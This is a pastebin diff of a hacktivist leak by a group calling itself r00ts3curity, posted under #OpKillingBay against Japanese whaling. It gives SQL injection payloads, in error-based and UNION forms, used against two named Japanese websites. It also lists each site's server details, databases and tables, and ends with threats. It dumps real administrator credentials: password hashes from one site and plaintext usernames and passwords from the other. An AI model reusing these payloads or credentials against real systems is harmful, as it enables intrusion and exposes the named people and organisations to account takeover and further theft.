SHOW:
|
|
- or go back to the newest paste.
1 | ################################################################################################################### | |
2 | ----------------------------------@r00ts3c_lulz - @Goons3c----------------------------------------------------- | |
3 | ||
4 | ||
5 | ,--. ,--. ,--. ,----. ,--. ,--. | |
6 | ,--.--. / \ / \ ,-' '-. ,---. '.-. | ,---.,--.,--.,--.--.`--',-' '-.,--. ,--. | |
7 | | .--'| () || () |'-. .-'( .-' .' < | .--'| || || .--',--.'-. .-' \ ' / | |
8 | | | \ / \ / | | .-' `)/'-' |\ `--.' '' '| | | | | | \ ' | |
9 | `--' `--' `--' `--' `----' `----' `---' `----' `--' `--' `--' .-' / | |
10 | `---' | |
11 | - | @Goons3c - @r00ts3c_lulz - @FraudFighter2 - @d0ct0r_dOom |
11 | + | This is #OpKillingBayEngaged. |
12 | - | #OpPedoFear - #OpDuffy - #r00ts3curity. |
12 | + | Official Video: |
13 | http://www.youtube.com/watch?v=kye4xA6xRB4 | |
14 | - | #################################################################################################################### |
14 | + | |
15 | - | Announcement; |
15 | + | ################################################################################################################## |
16 | - | Dear Japanese Government, |
16 | + | #Target: http://service-js.jp |
17 | - | |
17 | + | |
18 | - | Due to your lack of knowing right from wrong, and allowing your people to not only trap, but slaughter innocent wales and dolphins. We(r00ts3c) are absolutely disgusted with your "sensible" ways. Dolphins and wales ARE NOT the same as slaughtering a pig or a cow. These are beautiful and majestic creatures! And lets not even mention you don't even eat what you kill, which makes it a thrill hunt. Congrats, that's now strike #2. Here comes #3, you not only decide you want to "farm" these animals but you TORTURE them before you kill them. |
18 | + | |
19 | - | |
19 | + | Type: UNION query |
20 | - | This is where we step in, we aren't a political group. We are here to defend the innocent and bring peace and justice to the beautiful and majestic creatures of the sea. |
20 | + | Title: MySQL UNION query (NULL) - 4 columns |
21 | - | |
21 | + | Payload: id=-7252 UNION ALL SELECT NULL,CONCAT(0x7176677371,0x56554c4e786e76716649,0x71686e7871),NULL,NULL# |
22 | - | We are r00ts3curity. |
22 | + | |
23 | - | You can expect #Lulz and #Leaks. |
23 | + | web server operating system: Linux CentOS 5.8 |
24 | - | #Fuckin' shit up, since day #1. |
24 | + | web application technology: Apache 2.2.3, PHP 5.3.10 |
25 | - | ##################################################################################################################### |
25 | + | back-end DBMS: active fingerprint: MySQL >= 5.5.0 |
26 | - | #Target: http://www.japanarts.co.jp |
26 | + | banner: '5.5.21' |
27 | database management system users [1]: | |
28 | [*] 'gt503002'@'localhost' | |
29 | - | Type: error-based |
29 | + | |
30 | - | Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause |
30 | + | available databases [3]: |
31 | - | Payload: id=156 AND (SELECT 3953 FROM(SELECT COUNT(*),CONCAT(0x7176647171,(SELECT (CASE WHEN (3953=3953) THEN 1 ELSE 0 END)),0x7174616a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&lang=2 |
31 | + | [*] gt503002 |
32 | [*] information_schema | |
33 | - | available databases [2]: |
33 | + | [*] test |
34 | --------- | |
35 | - | [*] japanarts |
35 | + | Database: gt503002 |
36 | [51 tables] | |
37 | - | Database: japanarts |
37 | + | +-------------------------+ |
38 | - | [10 tables] |
38 | + | | forum_report | |
39 | - | +-----------------+ |
39 | + | | forum_report_content | |
40 | - | | m_admin | |
40 | + | | hs | |
41 | - | | m_class | |
41 | + | | hs_pic | |
42 | - | | t_artist | |
42 | + | | jinzai_ikusei | |
43 | - | | t_artist_blog | |
43 | + | | positive_admin_user | |
44 | - | | t_banner | |
44 | + | | positive_answer | |
45 | - | | t_history | |
45 | + | | positive_category | |
46 | - | | t_infomation | |
46 | + | | positive_company | |
47 | - | | t_notification | |
47 | + | | positive_event | |
48 | - | | t_others_blog | |
48 | + | | positive_main_question | |
49 | - | | t_sp_infomation | |
49 | + | | positive_password | |
50 | - | +-----------------+ |
50 | + | | positive_poster | |
51 | - | ---------------------------------------------------------- |
51 | + | | positive_sub_question | |
52 | - | web application technology: Apache 2.2.25, PHP 5.2.17 |
52 | + | | positive_user_type | |
53 | - | back-end DBMS: MySQL 5.0 |
53 | + | | seminar_form | |
54 | - | Database: japanarts |
54 | + | | svc_DEF_G0401 | |
55 | - | Table: m_admin |
55 | + | | svc_DEF_G0402 | |
56 | - | [5 entries] |
56 | + | | svc_DEF_G0403 | |
57 | - | +---------+-----------+-----------+----------------------------------+ |
57 | + | | svc_DEF_G0404 | |
58 | - | | user_id | login_id | name | password | |
58 | + | | svc_DEF_G0405 | |
59 | - | +---------+-----------+-----------+----------------------------------+ |
59 | + | | svc_DEF_G0406 | |
60 | - | | 1 | admin | yoshimura | 7eb041bc9cbd4bdd366c5c7493a36cc2 | |
60 | + | | svc_DEF_G0407 | |
61 | - | | 2 | promotion | user1 | 71a3afc79e255429ab05cedee463d2dd | |
61 | + | | svc_DEF_G0408 | |
62 | - | | 3 | artist | user2 | 71a3afc79e255429ab05cedee463d2dd | |
62 | + | | svc_DEF_G0409 | |
63 | - | | 4 | parttime | user3 | 71a3afc79e255429ab05cedee463d2dd | |
63 | + | | svc_DEF_G0410 | |
64 | - | | 5 | fullspeed | fullspeed | 7ff1481a2dae8c9e1885571e52d7564f | |
64 | + | | svc_DEF_G0411 | |
65 | - | +---------+-----------+-----------+----------------------------------+ |
65 | + | | svc_G0401 | |
66 | | svc_G0402 | | |
67 | | svc_G0403 | | |
68 | | svc_G0404 | | |
69 | | svc_G0405 | | |
70 | | svc_G0406 | | |
71 | | svc_G0407 | | |
72 | | svc_G0408 | | |
73 | | svc_G0409 | | |
74 | | svc_G0410 | | |
75 | | svc_G0411 | | |
76 | | svc_def_category | | |
77 | | svc_list | | |
78 | | tbl_inq_answer | | |
79 | | tbl_inq_template | | |
80 | | tbl_login_user | | |
81 | | tbl_news_status | | |
82 | | tbl_news_type | | |
83 | | tbl_service_application | | |
84 | | tbl_service_news | | |
85 | | tbl_service_news_test | | |
86 | | tbl_service_page | | |
87 | | tbl_service_page_test | | |
88 | | tbl_user | | |
89 | +-------------------------+ | |
90 | --------------------------- | |
91 | Database: gt503002 | |
92 | Table: positive_admin_user | |
93 | [15 entries] | |
94 | +---------------+-----------------+ | |
95 | | admin_user_pw | admin_user_name | | |
96 | +---------------+-----------------+ | |
97 | | bbb | aaa | | |
98 | | admin | admin | | |
99 | | admin2 | admin2 | | |
100 | | annie | annie | | |
101 | | bbb | bbb | | |
102 | | ikuo | ikuo | | |
103 | | inaba | inaba | | |
104 | | kabore | kabore | | |
105 | | inaba | kitayama | | |
106 | | kitayama | kitayama | | |
107 | | oomae | oomae | | |
108 | | rokuta | rokuta | | |
109 | | test | test | | |
110 | | test2 | test2 | | |
111 | | yaocho | yaocho | | |
112 | +---------------+-----------------+ | |
113 | ----------------------------------- | |
114 | Database: gt503002 | |
115 | Table: tbl_login_user | |
116 | [1 entry] | |
117 | +----------+------------+ | |
118 | | username | userpasswd | | |
119 | +----------+------------+ | |
120 | | 0003 | service | | |
121 | +----------+------------+ | |
122 | ################################################################################################## | |
123 | Remember, it's for the.. | |
124 | .; | |
125 | .`;' | |
126 | . ` ;;' | |
127 | . ` ` ` ;;;' | |
128 | ` @ ;;; | |
129 | ` ;;; | |
130 | ` ;;;; We are r00ts3curity | |
131 | ` ;;;;;. Be prepared Japan, here we come. | |
132 | ` .;;;;;;**. | |
133 | ` ;`* .;;; `**. | |
134 | . ` ;;`****. '*. | |
135 | '** ` ;;;;'****. . | |
136 | '****` ;;;;;`***. | |
137 | '*****` ;;;;;; `**. | |
138 | ` **` ;;;;;;; .* | |
139 | `*` ;;;;;;;; | |
140 | ` ;;;;;;;; | |
141 | ` ;;;;;;;; | |
142 | ` ;;;;;;; | |
143 | ` ;;;;;; . * #OpKillingBay | |
144 | ` ;;;; *** | |
145 | . ;; *** | |
146 | * * . ;; ** | |
147 | *** * ` .;; * | |
148 | ** .****. * * | |
149 | * . * ^^ *'. * **** | |
150 | * * * **** | |
151 | *** * * *** | |
152 | *** ** | |
153 | * *** | |
154 | *** | |
155 | ** |